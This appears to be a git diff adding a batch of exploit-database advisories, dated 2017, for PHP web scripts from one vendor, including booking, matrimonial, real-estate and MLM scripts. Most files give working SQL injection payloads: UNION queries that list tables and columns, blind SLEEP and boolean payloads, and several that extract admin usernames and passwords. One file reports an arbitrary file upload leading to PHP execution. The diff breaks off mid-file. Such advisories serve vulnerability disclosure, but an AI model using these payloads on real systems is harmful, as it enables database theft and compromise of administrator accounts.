b/exploits/php/webapps/43294.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Professional Service Script 1.0 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/professional-service-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service-list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# http://server/service-list?city='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43295.txt b/exploits/php/webapps/43295.txt new file mode 100644 index 000000000..f36d1f373 --- /dev/null +++ b/exploits/php/webapps/43295.txt @@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: Readymade PHP Classified Script 3.3 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/advance-olx-clone/ +# Version: 3.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/categories?subctid=[SQL] +# +# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# 2) +# http://localhost/[PATH]/categories?&mctid=[SQL] +# +# -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43296.txt b/exploits/php/webapps/43296.txt new file mode 100644 index 000000000..c83eb152d --- /dev/null +++ b/exploits/php/webapps/43296.txt @@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: Readymade Video Sharing Script 3.2 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ +# Version: 3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit= +# +# http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit= +# +# Parameter: report_videos[] (GET) +# Type: boolean-based blind +# Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) +# Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit= +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43297.txt b/exploits/php/webapps/43297.txt new file mode 100644 index 000000000..d7d888f1d --- /dev/null +++ b/exploits/php/webapps/43297.txt @@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: Responsive Realestate Script 3.2 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/responsive-realestate-script/ +# Version: 3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1= +# +# 34 columns +# +# Parameter: tbud (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: tbud=5001-10000 AND 4719=4719&quicksrch1= +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43299.txt b/exploits/php/webapps/43299.txt new file mode 100644 index 000000000..eb6b138aa --- /dev/null +++ b/exploits/php/webapps/43299.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Multireligion Responsive Matrimonial 4.7.2 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/ +# Version: 4.7.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/success-story.php?succid=[SQL] +# +# -16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43300.txt b/exploits/php/webapps/43300.txt new file mode 100644 index 000000000..2524ecea6 --- /dev/null +++ b/exploits/php/webapps/43300.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: Responsive Events & Movie Ticket Booking Script 3.2.1 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/ +# Version: 3.2.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/findcity.php?q=[SQL] +# +# s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+- +# +# +# Parameter: q (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: q=s%' AND 6957=6957 AND '%'=' +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: q=s%' AND SLEEP(5) AND '%'=' +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43301.txt b/exploits/php/webapps/43301.txt new file mode 100644 index 000000000..414ad3291 --- /dev/null +++ b/exploits/php/webapps/43301.txt @@ -0,0 +1,39 @@ +# # # # # +# Exploit Title: Multiplex Movie Theater Booking Script 3.1.5 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/multiplex-theater-booking-script/ +# Version: 3.1.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/trailer-detail.php?moid=[SQL] +# +# -122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+- +# +# +# 2) +# http://localhost/[PATH]/show-time.php?moid=[SQL] +# +# -102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+- +# +# +# 3) +# http://localhost/[PATH]/event-detail.php?eid=[SQL] +# +# -45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43302.txt b/exploits/php/webapps/43302.txt new file mode 100644 index 000000000..cf2e2797a --- /dev/null +++ b/exploits/php/webapps/43302.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Single Theater Booking Script 3.2.1 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/single-theater-booking-script/ +# Version: 3.2.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/findcity.php?q=[SQL] +# +# s'++/*!02222UNION*/+/*!02222SELECT*/+1,2,3,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),5--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43304.txt b/exploits/php/webapps/43304.txt new file mode 100644 index 000000000..1ffa752b5 --- /dev/null +++ b/exploits/php/webapps/43304.txt @@ -0,0 +1,57 @@ +# # # # # +# Exploit Title: Advanced Real Estate Script 4.0.7 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/advanced-real-estate-script/ +# Version: 4.0.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search-results.php?Projectmain=[SQL]&search= +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+- +# +# +# 2) +# http://localhost/[PATH]/search-results.php?proj_type=[SQL]&search= +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!05555Select*/+export_set(5,@:=0,(/*!05555select*/+count(*)/*!05555from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!05555table_name*/,0x3c6c693e,2),/*!05555column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+- +# +# +# 3) +# http://localhost/[PATH]/search-results.php?searchtext=[SQL]&search= +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+- +# +# +# 4) +# http://localhost/[PATH]/search-results.php?sell_price=[SQL]&search= +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+- +# +# +# 5) +# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search= +# +# -1022220'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+- +# +# +# 6) +# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search= +# +# -45'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43305.txt b/exploits/php/webapps/43305.txt new file mode 100644 index 000000000..e3d5c65fd --- /dev/null +++ b/exploits/php/webapps/43305.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Entrepreneur Bus Booking Script 3.0.4 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/ +# Version: 3.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/booker_details.php?sourcebus=[SQL] +# +# -1++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+- +# +# -1++/*!09999UNION*/+/*!09999SELECT*/+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)/*!50000FROM*/(adminlogin)/*!50000WHERE*/(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,0x3c62723e555345524e414d453a,admin_username,0x3c62723e504153533a,admin_password,0x3c62723e564552204159415249,0x3c62723e))))x)--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43306.txt b/exploits/php/webapps/43306.txt new file mode 100644 index 000000000..d3b233355 --- /dev/null +++ b/exploits/php/webapps/43306.txt @@ -0,0 +1,33 @@ +# # # # # +# Exploit Title: MLM Forex Market Plan Script 2.0.4 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/ +# Version: 2.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/news_detail.php?newid=[SQL] +# +# -7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+- +# +# +# 2) +# http://localhost/[PATH]/event_detail.php?eventid=[SQL] +# +# -1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43307.txt b/exploits/php/webapps/43307.txt new file mode 100644 index 000000000..69576c75f --- /dev/null +++ b/exploits/php/webapps/43307.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: MLM Forced Matrix 2.0.9 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/mlm-forced-matrix/ +# Version: 2.0.9 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/news-detail.php?newid=[SQL] +# +# -7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43308.txt b/exploits/php/webapps/43308.txt new file mode 100644 index 000000000..7c96643ca --- /dev/null +++ b/exploits/php/webapps/43308.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Car Rental Script 2.0.4 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/car-rental-script/ +# Version: 2.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/countrycode1.php?val=[SQL] +# +# -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43309.txt b/exploits/php/webapps/43309.txt new file mode 100644 index 000000000..2bdbf30d3 --- /dev/null +++ b/exploits/php/webapps/43309.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Groupon Clone Script 3.01 - 'state_id' 's' SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/ +# Version: 3.01 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/city_ajax.php?state_id=[SQL] +# +# -1'++/*!09999UNION*/+/*!09999SELECT*/+0x31,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+- +# +# +# 2) +# http://localhost/[PATH]/category_list.php?search=[SQL] +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43310.txt b/exploits/php/webapps/43310.txt new file mode 100644 index 000000000..ac83b59c2 --- /dev/null +++ b/exploits/php/webapps/43310.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Muslim Matrimonial Script 3.02 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/matrimonial-script/ +# Version: 3.02 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/success-story.php?succid=[SQL] +# +# -12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43311.txt b/exploits/php/webapps/43311.txt new file mode 100644 index 000000000..dcc6b03ae --- /dev/null +++ b/exploits/php/webapps/43311.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Advanced World Database 2.0.5 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/advanced-world-database/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL] +# http://localhost/[PATH]/state.php?country=[SQL] +# +# Parameter: country (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43312.txt b/exploits/php/webapps/43312.txt new file mode 100644 index 000000000..b25a15a33 --- /dev/null +++ b/exploits/php/webapps/43312.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Resume Clone Script 2.0.5 - SQL Injection +# Dork: N/A +# Date: 10.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/resume-builder-script/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/preview.php?id=[SQL] +# +# -2++/*!08888UNION*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x28313129,0x28313229,0x28313329,0x28313429)--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43314.html b/exploits/php/webapps/43314.html new file mode 100644 index 000000000..6b97a0f95 --- /dev/null +++ b/exploits/php/webapps/43314.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43315.txt b/exploits/php/webapps/43315.txt new file mode 100644 index 000000000..6aa947eae --- /dev/null +++ b/exploits/php/webapps/43315.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload +# Dork: N/A +# Date: 11.12.2017 +# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio +# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 +# Demo: http://vanguard-demo.esy.es/ +# Version: 1.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users upload arbitrary file.... +# +# Vulnerable Source: +# ..................... +# $row = $row->fetch(PDO::FETCH_ASSOC); +# $folder_name = $row['id'] * 2; +# $folder_name_2 = $folder_name * 5; +# $check_dir1 = 'uploads/'.$folder_name; +# $check_dir2 = $check_dir.'/'.$folder_name_2; +# if (!is_dir($check_dir1)) { mkdir($check_dir1); } +# if (!is_dir($check_dir2)) { mkdir($check_dir2); } +# $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); +# $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); +# $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); +# $error = 0; +# $upload_path = './'; +# ..................... +# +# Proof of Concept: +# +# Users Add a new product/Add a product preview... +# +# http://localhost/[PATH]/ +# http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43316.txt b/exploits/php/webapps/43316.txt new file mode 100644 index 000000000..aa67a9970 --- /dev/null +++ 